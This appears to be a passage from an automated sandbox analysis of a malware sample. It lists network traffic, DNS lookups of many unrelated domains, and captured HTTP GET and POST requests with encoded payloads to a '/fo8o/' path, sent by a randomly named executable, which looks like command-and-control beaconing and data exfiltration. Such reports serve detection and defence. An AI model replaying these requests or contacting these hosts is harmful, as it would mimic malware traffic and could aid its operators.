Apr 26, 2024 10:09:21.383476019 CEST	80	49745	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:21.384710073 CEST	49745	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:21.388138056 CEST	49745	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:21.550810099 CEST	80	49745	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:21.552423000 CEST	80	49745	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:21.723572016 CEST	80	49745	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:21.723704100 CEST	80	49745	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:21.724613905 CEST	49745	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:22.894520044 CEST	49745	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:23.916520119 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.073745012 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.073971033 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.075879097 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.233783007 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.405823946 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.405850887 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.405864954 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.405878067 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.406028986 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.414762020 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.414777994 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.414793015 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:24.414875984 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.437903881 CEST	49746	80	192.168.2.9	34.111.148.214
Apr 26, 2024 10:09:24.595422983 CEST	80	49746	34.111.148.214	192.168.2.9
Apr 26, 2024 10:09:29.736299992 CEST	49747	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:29.913007021 CEST	80	49747	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:29.916691065 CEST	49747	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:29.920550108 CEST	49747	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:30.096934080 CEST	80	49747	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:30.097098112 CEST	80	49747	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:30.097379923 CEST	80	49747	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:30.100675106 CEST	49747	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:31.426085949 CEST	49747	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:32.446676016 CEST	49748	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:32.622994900 CEST	80	49748	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:32.623107910 CEST	49748	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:32.627994061 CEST	49748	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:32.804229975 CEST	80	49748	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:32.804269075 CEST	80	49748	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:32.804599047 CEST	80	49748	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:32.804791927 CEST	49748	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:34.144639015 CEST	49748	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:35.163789034 CEST	49749	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:35.348525047 CEST	80	49749	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:35.348628998 CEST	49749	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:35.351722002 CEST	49749	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:35.527853966 CEST	80	49749	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:35.527931929 CEST	80	49749	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:35.528162956 CEST	80	49749	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:35.528636932 CEST	49749	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:36.863280058 CEST	49749	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:37.882460117 CEST	49750	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:38.058640957 CEST	80	49750	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:38.060808897 CEST	49750	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:38.064536095 CEST	49750	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:38.240544081 CEST	80	49750	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:38.240624905 CEST	80	49750	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:38.240879059 CEST	80	49750	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:38.241013050 CEST	49750	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:38.244528055 CEST	49750	80	192.168.2.9	217.196.55.202
Apr 26, 2024 10:09:38.420443058 CEST	80	49750	217.196.55.202	192.168.2.9
Apr 26, 2024 10:09:43.452567101 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:09:44.457005024 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:09:46.456994057 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:09:50.456979036 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:09:58.456996918 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:05.476105928 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:06.488264084 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:08.503905058 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:12.503880978 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:20.520020962 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:27.538733959 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:28.568562031 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:30.573239088 CEST	49751	80	192.168.2.9	185.237.107.49
Apr 26, 2024 10:10:34.582045078 CEST	49751	80	192.168.2.9	185.237.107.49

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 10:06:52.094216108 CEST	53773	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:06:52.754067898 CEST	53	53773	1.1.1.1	192.168.2.9
Apr 26, 2024 10:07:08.476727009 CEST	53499	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:07:08.966337919 CEST	53	53499	1.1.1.1	192.168.2.9
Apr 26, 2024 10:07:23.944869995 CEST	49211	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:07:24.528923988 CEST	53	49211	1.1.1.1	192.168.2.9
Apr 26, 2024 10:07:39.039515018 CEST	58962	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:07:39.411667109 CEST	53	58962	1.1.1.1	192.168.2.9
Apr 26, 2024 10:07:54.100915909 CEST	58930	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:07:54.832623959 CEST	53	58930	1.1.1.1	192.168.2.9
Apr 26, 2024 10:08:08.852384090 CEST	63972	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:08:09.044291019 CEST	53	63972	1.1.1.1	192.168.2.9
Apr 26, 2024 10:08:23.196527958 CEST	64943	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:08:23.473444939 CEST	53	64943	1.1.1.1	192.168.2.9
Apr 26, 2024 10:08:31.568504095 CEST	57004	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:08:31.973262072 CEST	53	57004	1.1.1.1	192.168.2.9
Apr 26, 2024 10:08:45.714138031 CEST	62097	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:08:46.305380106 CEST	53	62097	1.1.1.1	192.168.2.9
Apr 26, 2024 10:09:00.163781881 CEST	59166	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:09:00.502990007 CEST	53	59166	1.1.1.1	192.168.2.9
Apr 26, 2024 10:09:14.649514914 CEST	61885	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:09:15.644625902 CEST	61885	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:09:15.841492891 CEST	53	61885	1.1.1.1	192.168.2.9
Apr 26, 2024 10:09:15.841511965 CEST	53	61885	1.1.1.1	192.168.2.9
Apr 26, 2024 10:09:29.444849968 CEST	63110	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:09:29.732186079 CEST	53	63110	1.1.1.1	192.168.2.9
Apr 26, 2024 10:09:43.258378029 CEST	52761	53	192.168.2.9	1.1.1.1
Apr 26, 2024 10:09:43.446119070 CEST	53	52761	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 26, 2024 10:06:52.094216108 CEST	192.168.2.9	1.1.1.1	0x373d	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:08.476727009 CEST	192.168.2.9	1.1.1.1	0x34e3	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:23.944869995 CEST	192.168.2.9	1.1.1.1	0x16c3	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:39.039515018 CEST	192.168.2.9	1.1.1.1	0x3ebc	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:54.100915909 CEST	192.168.2.9	1.1.1.1	0x299f	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:08.852384090 CEST	192.168.2.9	1.1.1.1	0xa822	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:23.196527958 CEST	192.168.2.9	1.1.1.1	0x6b98	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:31.568504095 CEST	192.168.2.9	1.1.1.1	0xcfb0	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:45.714138031 CEST	192.168.2.9	1.1.1.1	0x723e	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:00.163781881 CEST	192.168.2.9	1.1.1.1	0xbee1	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:14.649514914 CEST	192.168.2.9	1.1.1.1	0xecdd	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:15.644625902 CEST	192.168.2.9	1.1.1.1	0xecdd	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:29.444849968 CEST	192.168.2.9	1.1.1.1	0xa6d7	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:43.258378029 CEST	192.168.2.9	1.1.1.1	0x842e	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 26, 2024 10:06:52.754067898 CEST	1.1.1.1	192.168.2.9	0x373d	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:08.966337919 CEST	1.1.1.1	192.168.2.9	0x34e3	No error (0)	www.kasegitai.tokyo		202.172.28.202	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:24.528923988 CEST	1.1.1.1	192.168.2.9	0x16c3	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:39.411667109 CEST	1.1.1.1	192.168.2.9	0x3ebc	No error (0)	www.antonio-vivaldi.mobi		46.30.213.191	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:07:54.832623959 CEST	1.1.1.1	192.168.2.9	0x299f	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:07:54.832623959 CEST	1.1.1.1	192.168.2.9	0x299f	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:07:54.832623959 CEST	1.1.1.1	192.168.2.9	0x299f	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:09.044291019 CEST	1.1.1.1	192.168.2.9	0xa822	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:23.473444939 CEST	1.1.1.1	192.168.2.9	0x6b98	Server failure (2)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:31.973262072 CEST	1.1.1.1	192.168.2.9	0xcfb0	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:08:46.305380106 CEST	1.1.1.1	192.168.2.9	0x723e	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:08:46.305380106 CEST	1.1.1.1	192.168.2.9	0x723e	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:00.502990007 CEST	1.1.1.1	192.168.2.9	0xbee1	No error (0)	www.donnavariedades.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:09:00.502990007 CEST	1.1.1.1	192.168.2.9	0xbee1	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:15.841492891 CEST	1.1.1.1	192.168.2.9	0xecdd	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:15.841492891 CEST	1.1.1.1	192.168.2.9	0xecdd	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:15.841511965 CEST	1.1.1.1	192.168.2.9	0xecdd	No error (0)	www.660danm.top		34.111.148.214	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:15.841511965 CEST	1.1.1.1	192.168.2.9	0xecdd	No error (0)	www.660danm.top		34.120.249.181	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:29.732186079 CEST	1.1.1.1	192.168.2.9	0xa6d7	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 26, 2024 10:09:29.732186079 CEST	1.1.1.1	192.168.2.9	0xa6d7	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Apr 26, 2024 10:09:43.446119070 CEST	1.1.1.1	192.168.2.9	0x842e	No error (0)	www.joyesi.xyz		185.237.107.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.kasegitai.tokyo

www.goldenjade-travel.com

www.antonio-vivaldi.mobi

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.donnavariedades.com

www.660danm.top

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49709	154.215.72.110	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:06:53.100013971 CEST	507	OUT	GET /fo8o/?OVFPBtpp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:06:53.437087059 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Apr 2024 08:06:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Apr 26, 2024 10:06:53.647475004 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 26 Apr 2024 08:06:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49710	202.172.28.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:09.257117033 CEST	774	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 65 32 50 36 35 52 31 36 77 70 59 45 4b 41 6c 70 46 79 32 6b 5a 6e 4b 34 78 55 42 50 Data Ascii: OVFPBtpp=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmfe2P65R16wpYEKAlpFy2kZnK4xUBP
Apr 26, 2024 10:07:09.559763908 CEST	360	IN	HTTP/1.1 404 Not Found Date: Fri, 26 Apr 2024 08:07:09 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49711	202.172.28.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:07:12.141343117 CEST	798	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.kasegitai.tokyo Origin: http://www.kasegitai.tokyo Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.kasegitai.tokyo/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 49 38 6e 70 39 55 49 68 6c 42 43 51 64 6e 62 6c 39 4b 6c 56 2b 79 55 57 5a 2f 75 56 2f 4b 5a 72 6c 52 67 5a 6e 67 57 64 73 44 35 32 6e 7a 57 4c 39 67 41 53 68 42 78 56 6e 79 51 45 74 35 72 53 55 34 69 6d 36 6c 68 38 71 66 79 69 6e 77 68 47 74 4a 4f 31 47 62 49 4d 4c 68 67 6f 42 69 70 58 65 67 55 46 2b 53 68 63 32 75 4f 6d 57 45 70 6a 35 6f 58 71 59 57 53 79 67 41 74 4d 50 2b 68 7a 47 74 66 43 58 30 50 61 42 45 41 32 67 4a 48 61 44 4f 48 6d 52 31 50 77 32 41 35 34 68 4a 59 2f 45 42 46 33 55 41 2f 2f 4d 77 4b 66 32 7a 49 6e 58 72 4e 6e 4c 50 6f 6a 63 68 42 6e 72 34 70 6a 75 43 36 53 57 51 3d 3d Data Ascii: OVFPBtpp=5JlKLzaKVp1wI8np9UIhlBCQdnbl9KlV+yUWZ/uV/KZrlRgZngWdsD52nzWL9gAShBxVnyQEt5rSU4im6lh8qfyinwhGtJO1GbIMLhgoBipXegUF+Shc2uOmWEpj5oXqYWSygAtMP+hzGtfCX0PaBEA2gJHaDOHmR1Pw2A54hJY/EBF3UA//MwKf2zInXrNnLPojchBnr4pjuC6SWQ==
